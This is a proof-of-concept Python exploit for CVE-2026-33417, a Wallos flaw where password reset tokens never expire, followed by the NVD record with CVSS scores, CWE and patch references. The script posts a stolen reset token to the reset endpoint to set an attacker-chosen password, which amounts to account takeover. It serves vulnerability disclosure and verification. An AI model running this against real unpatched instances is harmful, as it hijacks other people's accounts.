CVE-2026-33417

#!/usr/bin/env python3 """ PoC for CVE-2026-33417 (Wallos Password Reset Token Expiration Bypass) This script demonstrates that an old password reset token can be used indefinitely. Note: This requires a valid token obtained previously. """ import requests target_url = "http://localhost/wallos" # Example token obtained from an email or log weeks ago stolen_token = "abc123xyz-old-token-2025" new_password = "AttackerPass123!" # The endpoint that processes the password reset reset_endpoint = f"{target_url}/reset-password" payload = { "token": stolen_token, "password": new_password, "confirm_password": new_password } print(f"[*] Attempting to use old token: {stolen_token}") try: response = requests.post(reset_endpoint, data=payload) if response.status_code == 200 and "success" in response.text.lower(): print("[+] Password reset successfully using the old token!") print("[+] The vulnerability is confirmed: Token does not expire.") else: print(f"[-] Failed or invalid response. Status: {response.status_code}") print(response.text) except Exception as e: print(f"Error: {e}")

{"cve": {"id": "CVE-2026-33417", "sourceIdentifier": "[email protected]", "published": "2026-03-24T19:16:53.540", "lastModified": "2026-03-26T20:59:31.423", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Wallos is an open-source, self-hostable personal subscription tracker. Prior to version 4.7.2, password reset tokens in Wallos never expire. The password_resets table includes a created_at timestamp column, but the token validation logic never checks it. A password reset token remains valid indefinitely until it is used, allowing an attacker who intercepts a reset link at any point to use it days, weeks, or months later. This issue has been patched in version 4.7.2."}, {"lang": "es", "value": "Wallos es un rastreador de suscripciones personal de código abierto y autoalojable. Antes de la versión 4.7.2, los tokens de restablecimiento de contraseña en Wallos nunca caducaban. La tabla password_resets incluye una columna de marca de tiempo created_at, pero la lógica de validación del token nunca la verifica. Un token de restablecimiento de contraseña permanece válido indefinidamente hasta que se utiliza, permitiendo a un atacante que intercepta un enlace de restablecimiento en cualquier momento usarlo días, semanas o meses después. Este problema ha sido parcheado en la versión 4.7.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-613"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wallosapp:wallos:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.7.2", "matchCriteriaId": "8D7E175D-54D9-47F3-8124-8E017924D210"}]}]}], "references": [{"url": "https://github.com/ellite/Wallos/commit/90bb6186ee4091590b6efdef824c85f2494ff2bb", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/ellite/Wallos/security/advisories/GHSA-p3fv-m43r-3fhf", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}